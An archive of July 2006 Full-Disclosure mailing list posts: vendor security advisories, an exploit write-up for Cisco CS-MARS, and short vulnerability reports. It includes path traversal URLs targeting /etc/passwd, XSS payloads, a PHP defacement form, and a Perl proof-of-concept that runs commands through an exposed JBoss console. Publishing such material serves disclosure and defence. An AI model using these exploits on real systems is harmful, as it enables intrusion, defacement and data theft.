[Full-disclosure] ASP.DLL Include File Buffer Overflow
= ASP.DLL Include File Buffer Overflow = = MS Bulletin posted: = http://www.microsoft.com/technet/security/Bulletin/MS06-034.mspx = = Affected Software: =IIS 5.0 =IIS 5.1 =IIS 6.0 = = Public disclosure on July 19, 2006 == Overview == A buffer overflow exists in ASP.DLL that can be exploited by creating a .asp file containing a parameter for the include SSI command. !-- #include file=long buffer --OVERFLOWDATA The include function in ASP.DLL, checks if the parameter is longer than 260 bytes. If it is then an error is caused, but before causing the error a miscalculated copy is done. mov edi, [ebp+var_228] ; load length of parameter cmp edi, 104h; check if larger than 260 bytes jbe short loc_ mov esi, [ebp+var_22C] ; load address of parameter lea eax, [edi+esi-104h] ; load eax with the address of the last ; 260 bytes of the parameter ; (length of string+source of string)- 104h lea edx, [ebp+var_211] ; load edx with address on stack sub edx, eax ; mov cl, [eax]; \ mov [edx+eax], cl; do the copy inc eax ; and overflow the stack testcl, cl ; / jnz short loc_7096D1F3 ; Funnily enough, the solution was to remove this copy as the resulting data was never actually used. == Exploitation == Exploitation requires the ability to upload or somehow create a file with a .asp extension in a folder that will allow .asp processing. Since ASP.DLL usually runs under the IWAM_ account, there is no privilege escalation through this vulnerability. It is however possible to bypass any security restrictions enforced by ASP. It also allows for the execution of APIS that have no ASP equivalent. == Solutions == - Install the vendor supplied patch. == Credit == Discovered and advised to Microsoft February, 2006 by Brett Moore of Security-Assessment.com Same Bug Different App http://www.security-assessment.com/Presentations/SBDA_Ruxcon_2005.ppt In memory of; http://www.nsfocus.com/english/homepage/research/0305.htm and http://www.eeye.com/html/research/advisories/AD20001003.html == About Security-Assessment.com == Security-Assessment.com is a leader in intrusion testing and security code review, and leads the world with SA-ISO, online ISO17799 compliance management solution. Security-Assessment.com is committed to security research and development, and its team have previously identified a number of vulnerabilities in public and private software vendors products. -- This message has been scanned for viruses and dangerous content by Bizo Email Filter, and is believed to be clean. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple Vulnerabilities RPS
Advisory #13 Title: Multiple Vulnerabilities RPS (rigter portal system)# # # Author: 0o_zeus_o0 ( Arturo Z. )# Contact:
[EMAIL PROTECTED]# Website: www.elitemexico.org# Date: 18/07/06# Risk: medium# Vendor Url: http://rps.rigtersir.com/
# Affected Software: RPS# Non Affected: RPS V 4##Info:###UPLOAD FILES# it allows the user to raise archives without having administration privileges
###SQL inyección#it allows the user to insert post without having to be admin with this can make xss or #HTML injection###example of upload files##
##http://www.vuln.com/[path]/adm/photos/images.php##http://www.vuln.com/[path]//adm/down/files.phpexample Remote Execution
http://www.vuln.com/[path]/index.php?id=../../../../../etc/passwd##http://www.vuln.com/[path]/index.php?id=../../../home/victim/public_html/index
#Solution:#VULNERABLE VERSIONS##
# v1.0, 2.0 3.0Contact information#0o_zeus_o0#zeus@diosdelared.com#www.elitemexico.org
###greetz: lady fire,Mi beba, olimpus klan team and elitemexico# #Original Advisory: http://zeus.pccentervillaflores.com//13.txt
##SQL inyección in Articulos exploit?php/*RPS Defacer by: 0o_ZEUS_o0 OliMpusKlaN •~ FX ~•Date: 08/01/06
Website: www.elitemexico.org*/?htmlheadtitleRPS Defacer/title/headbody text=#FF bgcolor=#00
p align=centerfont face=Verdana size=2bufont color=#FFRPS Defacerbrbr/font/ufont color=#FF0o_ZEUS_o0 OliMpusKlaN br / •~ FX ~•/font/b/font/p
form method=POST ACTION="" name=rps_defacer center table border=0 cellpadding=5 cellspacing=0 style=border-collapse: collapse width=40%
tr td width=100%bfont face=Verdana size=1Direccion:br input type=text name=url size=30 value=http:///font/b/td
/tr tr td width=100%bfont size=1 face=VerdanaAutor:br input type=text name=autor size=20/font/b/td
/tr tr td width=100%bfont face=Verdanafont size=1Email:br input type=text name=email size=20/font/font/b/td
/tr tr td width=100%bfont size=1 face=VerdanaTitulo:br input type=text name=titulo size=30/font/b/td
/tr tr td width=100%bfont size=1 face=VerdanaContenido: (Soporta HTML Inyection)br textarea rows=13 name=articulo cols=55/textarea/font/b/td
/tr tr td width=100% p align=centerbfont face=Verdana size=1 input type=submit value=Enviar name=send
input type=reset value=Restablecer name=delete/font/b/td /tr /table /center /div
/form?if($action="">$web= $_POST['url'];echo script LANGUAGE=\_javascript_\var pagina=\$web/adm/add_art.php\function redireccionar()
{location.href="">}setTimeout (\redireccionar()\, 0001);/script;}?/body/html
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] VMSA-2006-0003 VMware possible incorrect permissions on SSL key files
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - --- VMware Security Advisory Advisory ID: VMSA-2006-0003 Synopsis: VMware possible incorrect permissions on SSL key files VMware Player for Linux VMware Workstation for Linux VMware Server for Linux VMware ESX Server 2.x VMware Infrastructure 3 NOT VULNERABLE: VMware Player for Windows NOT VULNERABLE: VMware Workstation for Windows NOT VULNERABLE: VMware Server for Windows VMTN Knowledge Base URL: http://kb.vmware.com/kb/2467205 Issue date:2006-07-18 Updated on:2006-07-18 CVE Name: CVE-2006-3589 - --- 1. Summary: The configuration program, vmwareconfig.pl, may not correctly set file permissions on the generated SSL Key files which is used for encrypting traffic for remote administrative connections. VMware has given this issue a Priority 3 severity rating. 2. Relevant release: VMware Player for Linux VMware Workstation for Linux VMware Server for Linux VMware Infrastructure 3 NOT VULNERABLE: VMware Player for Windows NOT VULNERABLE: VMware Workstation for Windows NOT VULNERABLE: VMware Server for Windows 3. Problem description: The script vmware-config.pl sets permissions on the key and certificate files to safe values. However this script does not use the safe_chmod() subroutine which reports errors on failure. Instead, the native Perl chmod() function is used, without any return code checking. Because the safe_chmod() subroutine is not used and no return code checks are performed, the user is not alerted if the chmod() fails. Depending on the umask being used at the time this could leave the key file readable to any local user on the system. 4. Solution: VMware is working on a fix, and there is a workaround. Manually change the permissions on the key and certificate to its intended values. The following commands would be appropriate on a default installation: # chmod 400 /etc/vmware/ssl/rui.key # chmod 444 /etc/vmware/ssl/rui.crt The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-3589 to this issue. 5. References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3589 6. Acknowledgments VMware would like to thank Nick Breese and security-assessment.com. 7. Contact: http://www.vmware.com/security Copyright 2006 VMware Inc. All rights reserved. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFErFC+LsZLrftG15MRAmm8AKCj6Li52ztaGuPO78GyqXWaQSLTRgCaAnj3 3Wg2D5U/S9SkrzDSTR9OsWI= =wppd -END PGP SIGNATURE- -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - --- VMware Security Advisory Advisory ID: VMSA-2006-0003 Synopsis: VMware possible incorrect permissions on SSL key files VMware Player for Linux VMware Workstation for Linux VMware Server for Linux VMware ESX Server 2.x VMware Infrastructure 3 NOT VULNERABLE: VMware Player for Windows NOT VULNERABLE: VMware Workstation for Windows NOT VULNERABLE: VMware Server for Windows VMTN Knowledge Base URL: http://kb.vmware.com/kb/2467205 Issue date:2006-07-18 Updated on:2006-07-18 CVE Name: CVE-2006-3589 - --- 1. Summary: The configuration program, vmwareconfig.pl, may not correctly set file permissions on the generated SSL Key files which is used for encrypting traffic for remote administrative connections. VMware has given this issue a Priority 3 severity rating. 2. Relevant release: VMware Player for Linux VMware Workstation for Linux VMware Server for Linux VMware Infrastructure 3 NOT VULNERABLE: VMware Player for Windows NOT VULNERABLE: VMware Workstation for Windows NOT VULNERABLE: VMware Server for Windows 3. Problem description: The script vmware-config.pl sets permissions on the key and certificate files to safe values. However this script does not use the safe_chmod() subroutine which reports errors on failure. Instead, the native Perl chmod() function is used, without any return code checking. Because the safe_chmod() subroutine is not used and no return code checks are performed, the user is not alerted if the chmod() fails. Depending on the umask being used at the time this could leave the key file readable to any local user on the system. 4. Solution: VMware is working on a fix, and there is a workaround. Manually change the permissions
[Full-disclosure] [USN-313-2] OpenOffice.org vulnerabilities
=== Ubuntu Security Notice USN-313-2 July 19, 2006 openoffice.org2-amd64, openoffice.org2 vulnerabilities CVE-2006-2198, CVE-2006-2199, CVE-2006-3117 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: openoffice.org2-common 1.9.129-0.1ubuntu4.1 openoffice.org2-core 1.9.129-0.1ubuntu4.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: USN-313-1 fixed several vulnerabilities in OpenOffice for Ubuntu 5.04 and Ubuntu 6.06 LTS. This followup advisory provides the corresponding update for Ubuntu 5.10. For reference, these are the details of the original USN: It was possible to embed Basic macros in documents in a way that OpenOffice.org would not ask for confirmation about executing them. By tricking a user into opening a malicious document, this could be exploited to run arbitrary Basic code (including local file access and modification) with the user's privileges. (CVE-2006-2198) A flaw was discovered in the Java sandbox which allowed Java applets to break out of the sandbox and execute code without restrictions. By tricking a user into opening a malicious document, this could be exploited to run arbitrary code with the user's privileges. This update disables Java applets for OpenOffice.org, since it is not generally possible to guarantee the sandbox restrictions. (CVE-2006-2199) A buffer overflow has been found in the XML parser. By tricking a user into opening a specially crafted XML file with OpenOffice.org, this could be exploited to execute arbitrary code with the user's privileges. (CVE-2006-3117) Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2-amd64/openoffice.org2-amd64_1.9.129-0.1ubuntu4.1-1.diff.gz Size/MD5:30102 940d431dbc93185558bfe215f0d1bd31 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2-amd64/openoffice.org2-amd64_1.9.129-0.1ubuntu4.1-1.dsc Size/MD5: 934 46517c65ab2797905ae5fc54e18f093a http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2-amd64/openoffice.org2-amd64_1.9.129-0.1ubuntu4.1.orig.tar.gz Size/MD5: 280390449 8fc86346a5ca070fd41cc35ccf0db891 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2/openoffice.org2_1.9.129-0.1ubuntu4.1.diff.gz Size/MD5: 42651040 7eb1530f373880579e0b4f882d6f37d4 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2/openoffice.org2_1.9.129-0.1ubuntu4.1.dsc Size/MD5: 2747 1df80499afc5fe76f527f67baede96aa http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2/openoffice.org2_1.9.129.orig.tar.gz Size/MD5: 193239182 ca8c3fd5718fc31343abef213cb4df8d Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2/openoffice.org2-common_1.9.129-0.1ubuntu4.1_all.deb Size/MD5: 22894532 9ceea05764f1f3c7c7fb6e9ba4cced06 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2/openoffice.org2-dev-doc_1.9.129-0.1ubuntu4.1_all.deb Size/MD5: 4783358 d90c33a8f7d46ecb032e0b79a966cde0 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2/openoffice.org2-java-common_1.9.129-0.1ubuntu4.1_all.deb Size/MD5: 2792520 8ff58905701deb746209f38d59e50fbe http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2/openoffice.org2-l10n-en-us_1.9.129-0.1ubuntu4.1_all.deb Size/MD5: 588148 232eea25965ee05eb60579ec0c6680cf http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2/ttf-opensymbol_1.9.129-0.1ubuntu4.1_all.deb Size/MD5: 145466 62a12f481a92cce78f521a2afeb60f42 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2-amd64/openoffice.org2-base_1.9.129-0.1ubuntu4.1-1_amd64.deb Size/MD5: 2768862 e2e037a15d5aa56e0f5bde9300d78a7a http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2-amd64/openoffice.org2-calc_1.9.129-0.1ubuntu4.1-1_amd64.deb Size/MD5: 3514372 0df198e3a69f04746605f52239b252b3 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2-amd64/openoffice.org2-core_1.9.129-0.1ubuntu4.1-1_amd64.deb Size/MD5: 31007052 9bb773b5d9f762546389c33c410821a1 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2-amd64/openoffice.org2-draw_1.9.129-0.1ubuntu4.1-1_amd64.deb Size/MD5: 1749028 06ad64a99ba5cddf8375b2a2a83bade0 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org2-amd64/openoffice.org2-filter-so52_1.9.129-0.1ubuntu4.1-1_amd64.deb Size/MD5:27834
Re: [Full-disclosure] Symantec 3300 E-mail Gateway dropping spoofed mails
On Wed, 19 Jul 2006 14:00:50 +1000, Josh L. Perrymon said: X-NAI-Spam-Report: 2 Rules triggered * 1.8 -- MIME_MISSING_BOUNDARY -- The first error message.. RAW: MIME section missing boundary * 0.5 -- MIME_BASE64_LATIN -- RAW: Latin alphabet text using base64 encodi: and the second.. Content-type: multipart/alternative; boundary=HTMLDEMO44bc3b28b4ba5 OK so far... --HTMLDEMO44bc3b28b4ba5 And the *starting* boundary.. Content-Type: text/html; charset=ISO-8859-1 I'll get back to this.. Content-Transfer-Encoding: base64 DQoNCkF0dGVudGlvbiBFbWFpbCBVc2Vycyw8YnI+DQo8YnI+DQpEdWUgdG8gcmVjZW50IHNl DQoNCkF0dGVudGlvbiBFbWFpbCBVc2Vycyw8YnI+DQo8YnI+Y3Vy (snipped) cm8uZ292LmF1IDxicj4NCg0KDQo= end full Umm.. An *ending* boundary would be considered at least *polite*. Actually, required by the RFCs. So the first error message is in fact correct. I haven't actually *decoded* the text, and can't due to the (snipped), but I'm willing to bet that the second complaint is that it's tagged with charset=ISO-8859-1 when in fact all the text contained therein is actually US-ASCII. RFC2046, section 4.1.2: In general, composition software should always use the lowest common denominator character set possible. For example, if a body contains only US-ASCII characters, it SHOULD be marked as being in the US- ASCII character set, not ISO-8859-1, which, like all the ISO-8859 family of character sets, is a superset of US-ASCII. More generally, if a widely-used character set is a subset of another character set, and a body contains only characters in the widely-used subset, it should be labelled as being in that subset. This will increase the chances that the recipient will be able to view the resulting entity correctly. So again, the message is quite likely being impolite again. And this is the sort of impoliteness that spammers like to abuse. And I believe that even Microsoft MUAs are able to get this one right these days, so there's really no excuse for anybody except a spammer.. ;) pgpVn6rPeYyPH.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DELL Hardware KeyLogger??
http://virus.org.ua/unix/keylog/klog.htm scaring... Andy _ Grandes éxitos, superhéroes, imitaciones, cine y TV... http://es.msn.kiwee.com/ Lo mejor para tu móvil. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DELL Hardware KeyLogger??
kK 1 W1ll B173 No7 4s Sc4rY 4s 7H3 19NOR4nC3 4Nd L4CK OF 9OO9L3 Sk1lLs 7h47 JOO d1spl4Y. M0ron http://www.snopes.com/computer/internet/dellbug.asp (loV3 jOo n3tt3rs) On 7/19/06, Andres Molinetti [EMAIL PROTECTED] wrote: http://virus.org.ua/unix/keylog/klog.htm scaring... Andy _ Grandes éxitos, superhéroes, imitaciones, cine y TV... http://es.msn.kiwee.com/ Lo mejor para tu móvil. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] New Ploblem in Index.cfm
In The Name Of God Discoverer:SaiedHacker Group:HackeranShiraz Critical Level : Dangerous This matter happens in index.cfm when We want to run some specific Functions Such as action,event, and hacker Can start attacks such as XSS attack by Using simple script or HtML code. Exploit: Http://www.Site.com/path/index.cfm?action=script Http://www.Site.com/path/index.cfm?event=script Http://www.Site.com/path/index.cfm?fuseaction=script Xss: Http://www.Site.com/path/index.cfm?action=scriptalert(SaiedHacker);/script Http://www.Site.com/path/index.cfm?event=scriptalert(SaiedHacker);/script Http://www.Site.com/path/index.cfm?fuseaction=scriptalert(SaiedHacker);/script Have fun [EMAIL PROTECTED] www.SaiedHackerPro.PersianBlog.com __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DELL Hardware KeyLogger??
Okay, problem solved. Stupid hoax. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-320-1] PHP vulnerabilities
=== Ubuntu Security Notice USN-320-1 July 19, 2006 php4, php5 vulnerabilities CVE-2006-0996, CVE-2006-1490, CVE-2006-1494, CVE-2006-1608, CVE-2006-1990, CVE-2006-1991, CVE-2006-2563, CVE-2006-2660, CVE-2006-3011, CVE-2006-3016, CVE-2006-3018 === A security issue affects the following Ubuntu releases: Ubuntu 5.04 Ubuntu 5.10 Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.04: libapache2-mod-php4 4:4.3.10-10ubuntu4.5 php4-cgi 4:4.3.10-10ubuntu4.5 php4-cli 4:4.3.10-10ubuntu4.5 Ubuntu 5.10: libapache2-mod-php5 5.0.5-2ubuntu1.3 php5-cgi 5.0.5-2ubuntu1.3 php5-cli 5.0.5-2ubuntu1.3 php5-curl5.0.5-2ubuntu1.3 Ubuntu 6.06 LTS: libapache2-mod-php5 5.1.2-1ubuntu3.1 php5-cgi 5.1.2-1ubuntu3.1 php5-cli 5.1.2-1ubuntu3.1 php5-curl5.1.2-1ubuntu3.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: The phpinfo() PHP function did not properly sanitize long strings. A remote attacker could use this to perform cross-site scripting attacks against sites that have publicly-available PHP scripts that call phpinfo(). Please note that it is not recommended to publicly expose phpinfo(). (CVE-2006-0996) An information disclosure has been reported in the html_entity_decode() function. A script which uses this function to process arbitrary user-supplied input could be exploited to expose a random part of memory, which could potentially reveal sensitive data. (CVE-2006-1490) The wordwrap() function did not sufficiently check the validity of the 'break' argument. An attacker who could control the string passed to the 'break' parameter could cause a heap overflow; however, this should not happen in practical applications. (CVE-2006-1990) The substr_compare() function did not sufficiently check the validity of the 'offset' argument. A script which passes untrusted user-defined values to this parameter could be exploited to crash the PHP interpreter. (CVE-2006-1991) In certain situations, using unset() to delete a hash entry could cause the deletion of the wrong element, which would leave the specified variable defined. This could potentially cause information disclosure in security-relevant operations. (CVE-2006-3017) In certain situations the session module attempted to close a data file twice, which led to memory corruption. This could potentially be exploited to crash the PHP interpreter, though that could not be verified. (CVE-2006-3018) This update also fixes various bugs which allowed local scripts to bypass open_basedir and 'safe mode' restrictions by passing special arguments to tempnam() (CVE-2006-1494, CVE-2006-2660), copy() (CVE-2006-1608), the curl module (CVE-2006-2563), or error_log() (CVE-2006-3011). Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.10-10ubuntu4.5.diff.gz Size/MD5: 281888 6b2f9b14e6b17fd16b39fc992370c700 http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.10-10ubuntu4.5.dsc Size/MD5: 1469 e107321f5a864fec29aba0ddc4557bda http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.10.orig.tar.gz Size/MD5: 4892209 73f5d1f42e34efa534a09c6091b5a21e Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.10-10ubuntu4.5_all.deb Size/MD5: 1128 e68858ad284ff509a9a7ba6004cd85b3 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/p/php4/libapache2-mod-php4_4.3.10-10ubuntu4.5_amd64.deb Size/MD5: 1657574 00032fa4aca5c15403f290cae27bfe38 http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-cgi_4.3.10-10ubuntu4.5_amd64.deb Size/MD5: 3275318 be667056767f298619d7c48d73f22c00 http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-cli_4.3.10-10ubuntu4.5_amd64.deb Size/MD5: 1647612 d615fd92ad1609108ec1e877ce748ade http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-common_4.3.10-10ubuntu4.5_amd64.deb Size/MD5: 168182 ad4bd0b977814c2c3379235d76cf2ed2 http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-dev_4.3.10-10ubuntu4.5_amd64.deb Size/MD5: 348270 03f94109b0ea8c73d8d88e50e10efede i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/p/php4/libapache2-mod-php4_4.3.10-10ubuntu4.5_i386.deb Size/MD5: 1592870
[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in Cisco Security Monitoring, Analysis and Response System (CS-MARS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Multiple Vulnerabilities in Cisco Security Monitoring, Analysis and Response System (CS-MARS) Document ID: 70728 Advisory ID: cisco-sa-20060719-mars http://www.cisco.com/warp/public/707/cisco-sa-20060719-mars.shtml Revision 1.0 For Public Release 2006 July 19 1600 UTC (GMT) - --- Contents Summary Affected Products Details Impact Software Version and Fixes Workarounds Obtaining Fixed Software Exploitation and Public Announcements Status of this Notice: FINAL Distribution Revision History Cisco Security Procedures - --- Summary === Cisco Security Monitoring, Analysis and Response System (CS-MARS) software contains vulnerabilities related to third-party software and the command line interface (CLI). * CS-MARS ships with an Oracle database. The database contains several default Oracle accounts which have well-known passwords. If access to the database is obtained, the default accounts may be used to access sensitive information contained in the database. * CS-MARS ships with the JBoss web application server. A component of the JBoss installation may allow a remote, unauthenticated user to execute arbitrary shell commands with the privileges of the CS-MARS administrator. * The CS-MARS CLI contains several vulnerabilities which may allow authenticated administrators to execute arbitrary shell commands with root privileges. All vulnerabilities addressed in this advisory have been corrected in CS-MARS software version 4.2.1. Cisco has made free software available to address these vulnerabilities for affected customers. There are no workarounds. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20060719-mars.shtml. Affected Products = Vulnerable Products +-- CS-MARS software versions prior to 4.2.1 are affected by vulnerabilities addressed in this advisory. To verify the version of CS-MARS software, use a SSH client to login into the system administration command line interface with the pnadmin account and execute the version command. prompt$ ssh [EMAIL PROTECTED] [EMAIL PROTECTED]'s password: Last login: Tue Jun 20 16:22:34 2006 from 10.0.0.2 CS MARS - Mitigation and Response System ? for list of commands [pnadmin]$ version 4.1.5 (2198) Products Confirmed Not Vulnerable + No other Cisco products are currently known to be affected these vulnerabilities. Details === Cisco Security Monitoring, Analysis and Response System (CS-MARS) is a security system that receives event logs from various network devices, correlates and analyzes the received data for security problems and reports the findings. In addition, CS-MARS can perform automated tasks to mitigate security problems. * CS-MARS utilizes an Oracle database to store sensitive network event and configuration data. The information contained in the database potentially includes authentication credentials for network devices such as firewalls, routers and IPS devices and the details of network security events. By default, Oracle databases contain several built-in accounts with well-known passwords. If access can be gained to the database, the accounts could potentially be used to compromise the information stored in the database. The CS-MARS appliance is hardened to prevent local and remote unauthorized access to the database. As a precaution, the database accounts have been disabled by Cisco to prevent abuse should a method to access the database be discovered. The CS-MARS application does not use the default Oracle database accounts. This vulnerability is documented by Cisco bug ID CSCsd16256. * CS-MARS contains an installation of the JBoss web application server. It may be possible for a remote, unauthenticated user to create a specially-crafted HTTP request which executes arbitrary shell commands on the CS-MARS appliance with the privileges of the CS-MARS administrator via the optional JBoss JMX console. This vulnerability is documented by Cisco bug ID CSCse47646. * The CS-MARS CLI is a restricted shell environment which allows authenticated administrators to perform system maintenance tasks. The CLI contains several privilege escalation vulnerabilities which may allow shell commands to be executed on the underlying appliance operating system with root privileges. These vulnerabilities are documented by Cisco bug IDs CSCsd29111, CSCsd31371, CSCsd31377, CSCsd31392 and CSCsd31972. Impact == * Exploitation of the default Oracle accounts vulnerability (CSCsd16256) may result in the compromise
[Full-disclosure] Cisco MARS 4.2.1 remote compromise
Cisco MARS (Monitoring, Analysis and Response System, sometimes referred
to as CS-MARS) prior to version 4.2.1 ships with an unprotected JBoss
installation which ultimately leads to a complete compromise of the
device.
The caveat here is that, despite much work on Cisco's part, they were
not able to determine why some CS-MARS boxes were vulnerable and others
were not. In versions 4.2.1 and newer, the discovered vulnerabilities
have been fixed.
Vulnerability #1
CS-MARS shipped with JBoss 3.2.7, which suffered a number of flaws
originally disclosed by Marc Schoenefeld in June of 2005. See
http://www.securityfocus.com/archive/1/402653 for the original posting.
Vulnerability #2
CS-MARS' JBoss installation is basically stock, so few if any of the
recommended procedures were taken to secure it prior to shipment.
A common document used in securing JBoss can be found at
http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureJBoss
Perhaps the most glaring vulnerability that results is the exposure of
the jmx-console, and in turn full access to all of the MBeans. Per
JBoss.org's description of the jmx-console:
The JMX console provides a raw view into the microkernel of the
JBoss application server. It lists all registered services (MBeans)
that are active in the application server and that can be accessed
either through the JMX console itself or programmatically from Java
code.
As you can imagine, once an attacker has access to the jmx-console, the
thoroughness with which the box can be compromised is only limited by
their imagination. The jmx console is reachable on CS-MARS devices
versions 4.2.1 -- no authentication is necessary, and is available on
port 80 and 443.
I've put together some functional POC exploit code that leverages many
of the MBeans to compromise the system in various ways. Please see the
attached code.
Vendor status
-
Cisco's PSIRT was extremely responsive throughout this entire process.
The JBoss issues I mentioned above are addressed by Cisco DDTS
CSCse47646, and fixed in version 4.2.1 and newer.
Enjoy,
-jon
#!/usr/bin/perl
#
# Cisco/Protego CS-MARS 4.2.1 remote command execution, system compromise
# via insecure JBoss installation.
#
# Fully functional POC code by Jon Hart [EMAIL PROTECTED]
#
# Addressed in CSCse47646
#
# CS-MARS is an event correlation product orginally written by Protego,
# which is now owned by Cisco. It is built on top of JBoss.
# Unfortunately, little or no effort was put in to securing the JBoss
# installation as per the JBoss community's recommended best practices.
# A such, the usual set of JBoss interfaces are wide open and it is up to
# the attacker how creative they want to be in compromising the box. This
# particular exploit vector abuses the JBoss jmx-console for all sorts of
# fun. It should also be noted that, because of the very old kernel
# running on most CS-MARS boxes (2.4.9), once JBoss is compromised, root is
# almost trivial. Thanks to Cisco PSIRT and Matt Cerha for their
# cooperation in getting this fixed.
#
#
# Copyright (C) 2006 Jon Hart
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 59 Temple
# Place, Suite 330, Boston, MA 02111-1307 USA
#
#
#
#
use strict;
use HTTP::Request::Common;
use LWP::UserAgent;
use IO::Socket;
my $target = shift(@ARGV) || usage;
my $attack_type = shift(@ARGV) || usage;
for ($attack_type) {
if(/pass/) { change_passwd(@ARGV); }
elsif (/cmd/) { run_cmd(@ARGV); }
elsif (/upload/) { upload(@ARGV); }
elsif (/[bean|bsh]/) { run_bsh(@ARGV); }
else { usage; }
}
sub change_passwd {
my $passwd = shift;
run_cmd(/opt/janus/release/bin/pnpasswd $passwd);
}
sub encode {
my $en = shift;
my $string = ;
foreach my $char (split(//, $en)) {
if ($char =~ /([:|\/|(|)||'|`| ])/) {
$string .= sprintf(%%%x, ord($1));
} else { $string .= $char; }
}
return $string;
}
sub jmx_post {
my $form_data = shift;
my $ua = LWP::UserAgent-new;
$ua-agent(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1));
my $req = HTTP::Request-new(POST =
http://$target/jmx-console/HtmlAdaptor;);
$req-content_type('application/x-www-form-urlencoded');
$req-content(encode($form_data));
my $res = $ua-request($req);
return $res-is_success ? 0 :
[Full-disclosure] [ GLSA 200607-06 ] libpng: Buffer overflow
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200607-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: libpng: Buffer overflow Date: July 19, 2006 Bugs: #138433, #138672 ID: 200607-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A buffer overflow has been found in the libpng library that could lead to the execution of arbitrary code. Background == libpng is an open, extensible image format library, with lossless compression. Affected packages = --- Package / Vulnerable / Unaffected --- 1 libpng1.2.12 = 1.2.12 2 emul-linux-x86-baselibs2.5.1= 2.5.1 --- # Package 2 [app-emulation/emul-linux-x86-baselibs] only applies to AMD64 users. NOTE: Any packages listed without architecture tags apply to all architectures... --- 2 affected packages --- Description === In pngrutil.c, the function png_decompress_chunk() allocates insufficient space for an error message, potentially overwriting stack data, leading to a buffer overflow. Impact == By enticing a user to load a maliciously crafted PNG image, an attacker could execute arbitrary code with the rights of the user, or crash the application using the libpng library, such as the emul-linux-x86-baselibs. Workaround == There is no known workaround at this time. Resolution == All libpng users should upgrade to the 